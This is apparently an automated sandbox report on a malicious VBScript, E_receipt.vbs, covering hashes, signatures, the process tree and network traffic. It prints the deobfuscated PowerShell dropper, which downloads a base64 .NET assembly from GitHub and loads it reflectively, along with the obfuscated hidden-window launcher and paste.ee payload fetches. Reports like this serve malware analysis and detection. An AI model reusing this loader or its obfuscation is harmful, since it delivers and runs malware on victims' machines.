Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

E_receipt.vbs

windows7-x64

10

E_receipt.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    09/10/2024, 18:04 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    E_receipt.vbs

  • Size

    3KB

  • MD5

    1f7229b717e61580e9baf2830ee7afd0

  • SHA1

    98ade23ab27475f6d62f97a45b76b247075ff421

  • SHA256

    fa4cc3e867b36269dab9161f078565ff9048ac55ea6dccb8a39b5e156009eabf

  • SHA512

    ed233c408b5e7f6948756ff6a7585733055de3ccb3b0408aed31b543a5da722f5e0de949cce3fef1dc22be07aa481205efd5aa2c99959195b3c6ed758e7715f3

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
"$url = 'https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt'; $base64Content = (New-Object System.Net.WebClient).DownloadString($url); $binaryContent = [System.Convert]::FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); [dnlib.IO.Home]::VAI(\"txt.3rx/moc.yapesmetsys//:sptth\", \"1\", \"C:\\ProgramData\\\", \"vagem\", \"RegAsm\", \"\",\"\")"|invoke-expression
3
4
# powershell snippet 1
5
$url = "https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt"
6
$base64content = (new-object system.net.webclient).downloadstring("https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt")
7
$binarycontent = [system.convert]::frombase64string($base64content)
8
$assembly = [reflection.assembly]::load($binarycontent)
9
[dnlib.io.home]::vai("txt.3rx/moc.yapesmetsys//:sptth", "1", "C:\\ProgramData\\", "vagem", "RegAsm", "", "")
10
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E_receipt.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYmNmdXJsJysnID0gTzNoaHR0JysncHM6LycrJy9yYXcuZ2knKyd0aCcrJ3VidXNlcmMnKydvbnRlbnQnKycuJysnY29tL05vJysnRGV0ZWMnKyd0T24vTm9EZXRlY3RPbi9yJysnZWZzL2hlJysnYWQnKydzL21haW4vJysnRGUnKyd0YWhOb3RoJysnLVYudHh0TzNoJysnOyAnKydiY2ZiYXNlNjRDb250JysnZW4nKyd0ID0nKycgKE5lJysndycrJy1PYmplY3QgJysnU3lzdGVtLk5ldC5XZScrJ2InKydDbGllbnQpJysnLkRvJysnd25sbycrJ2FkUycrJ3RyaW4nKydnKGJjZicrJ3VybCk7ICcrJ2InKydjJysnZmJpbmFyeUNvbnQnKydlbnQnKycgPSAnKydbJysnU3lzdGVtLicrJ0MnKydvbnYnKydlcnQnKyddOjpGcm9tQmFzZTY0U3RyaScrJ25nKGJjZmJhc2U2JysnNCcrJ0NvbnRlbnQpOycrJyBiJysnY2ZhcycrJ3NlbScrJ2JseSAnKyc9IFtSZWZsZWN0aW8nKyduJysnLkFzc2VtJysnYmx5XTo6TG9hZChiJysnY2YnKydiaScrJ25hcnknKydDbycrJ250ZW50KTsnKycgW2RubGknKydiJysnLkknKydPLkhvbWVdJysnOjpWJysnQUkoJysnbHRSdHh0LjNyJysneC9tb2MueWEnKydwZXMnKydtZXRzeScrJ3MvLzpzcHR0aGwnKyd0UicrJywgJysnbHRSMWx0UicrJywnKycgbCcrJ3RSQzo0VlBQJysncm9ncmFtRCcrJ2F0YTRWUGx0UiwgJysnbHQnKydSdicrJ2FnJysnZW1sdFIsJysnIGwnKyd0UlJlZycrJ0FzbWwnKyd0JysnUiwgbHQnKydSJysnbHRSLGx0UmwnKyd0JysnUiknKSAtUkVQbEFjRShbY0hBcl03OStbY0hBcl01MStbY0hBcl0xMDQpLFtjSEFyXTM5ICAtUkVQbEFjRSAnbHRSJyxbY0hBcl0zNCAtUkVQbEFjRSAgKFtjSEFyXTUyK1tjSEFyXTg2K1tjSEFyXTgwKSxbY0hBcl05MiAtUkVQbEFjRSAnYmNmJyxbY0hBcl0zNikgfC4oICRzaEVsTElkWzFdKyRTaEVMTElEWzEzXSsneCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bcfurl'+' = O3hhtt'+'ps:/'+'/raw.gi'+'th'+'ubuserc'+'ontent'+'.'+'com/No'+'Detec'+'tOn/NoDetectOn/r'+'efs/he'+'ad'+'s/main/'+'De'+'tahNoth'+'-V.txtO3h'+'; '+'bcfbase64Cont'+'en'+'t ='+' (Ne'+'w'+'-Object '+'System.Net.We'+'b'+'Client)'+'.Do'+'wnlo'+'adS'+'trin'+'g(bcf'+'url); '+'b'+'c'+'fbinaryCont'+'ent'+' = '+'['+'System.'+'C'+'onv'+'ert'+']::FromBase64Stri'+'ng(bcfbase6'+'4'+'Content);'+' b'+'cfas'+'sem'+'bly '+'= [Reflectio'+'n'+'.Assem'+'bly]::Load(b'+'cf'+'bi'+'nary'+'Co'+'ntent);'+' [dnli'+'b'+'.I'+'O.Home]'+'::V'+'AI('+'ltRtxt.3r'+'x/moc.ya'+'pes'+'metsy'+'s//:sptthl'+'tR'+', '+'ltR1ltR'+','+' l'+'tRC:4VPP'+'rogramD'+'ata4VPltR, '+'lt'+'Rv'+'ag'+'emltR,'+' l'+'tRReg'+'Asml'+'t'+'R, lt'+'R'+'ltR,ltRl'+'t'+'R)') -REPlAcE([cHAr]79+[cHAr]51+[cHAr]104),[cHAr]39 -REPlAcE 'ltR',[cHAr]34 -REPlAcE ([cHAr]52+[cHAr]86+[cHAr]80),[cHAr]92 -REPlAcE 'bcf',[cHAr]36) |.( $shElLId[1]+$ShELLID[13]+'x')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2936

Network

  • flag-us
    DNS
    paste.ee
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    paste.ee
    IN A
    Response
    paste.ee
    IN A
    172.67.187.200
    paste.ee
    IN A
    104.21.84.67
  • flag-us
    GET
    http://paste.ee/d/VO2TX
    WScript.exe
    Remote address:
    172.67.187.200:80
    Request
    GET /d/VO2TX HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 09 Oct 2024 18:04:26 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Location: https://paste.ee/d/VO2TX
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6%2FSDBW2kXV1RAChWVKeMPUaJMLRHdzPMxeVsBFNrxWqXVbg3GlYO32VzaW2khf9A2%2Fq1bLU4MBD1FJ%2BuwGoMErwXwa%2BGADpSwgUeaWFiwuXV5v4i8Jxkb%2FihQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Speculation-Rules: "/cdn-cgi/speculation"
    Server: cloudflare
    CF-RAY: 8d004b0a2a9abebe-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://paste.ee/d/VO2TX
    WScript.exe
    Remote address:
    172.67.187.200:443
    Request
    GET /d/VO2TX HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 18:04:27 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xgXXsHHfWMrU%2FOGOIlJdCA0M1DL6VOBnxahY5iJ0RLVxa9nkVyKRk5RpMM2kXFWQpNxcr%2BZ0Q1OwOgkrsGSZqxybAIz%2F8BeBZEPt2pHgx5FoMXSXT5fUnW%2F3CA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d004b0ccce39541-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    raw.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • 172.67.187.200:80
    http://paste.ee/d/VO2TX
    http
    WScript.exe
    403 B
     1.0kB
     5
    4

    HTTP Request

    GET http://paste.ee/d/VO2TX

    HTTP Response

    301
  • 172.67.187.200:443
    https://paste.ee/d/VO2TX
    tls, http
    WScript.exe
    5.6kB
     265.2kB
     112
    217

    HTTP Request

    GET https://paste.ee/d/VO2TX

    HTTP Response

    200
  • 185.199.109.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
     219 B
     5
    5
  • 185.199.109.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
     219 B
     5
    5
  • 8.8.8.8:53
    paste.ee
    dns
    WScript.exe
    54 B
     86 B
     1
    1

    DNS Request

    paste.ee

    DNS Response

    172.67.187.200
    104.21.84.67

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    powershell.exe
    71 B
     135 B
     1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.109.133
    185.199.111.133
    185.199.108.133
    185.199.110.133

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    115de104d2e417f732ad8ac27d2f835a

    SHA1

    dd210f9df79ee904e27b513249ba3a2a59ea20ff

    SHA256

    2119799f6fb5608553ad91f0ce7f16a1254233b52b55e2197df8cccbb77b9bda

    SHA512

    adb071e49f5c2410c8bc27382ee85602420aa49e1e4828788dde65bd8eee99171fa7365c81d1ee6056d99802483a7d9c5dce47f22313e3c4f765471e388f636d

    Download Submit

  • memory/612-4-0x000007FEF50CE000-0x000007FEF50CF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/612-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/612-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

    Filesize

    32KB

    Download

  • memory/612-12-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/612-13-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/612-14-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

    Filesize

    9.6MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.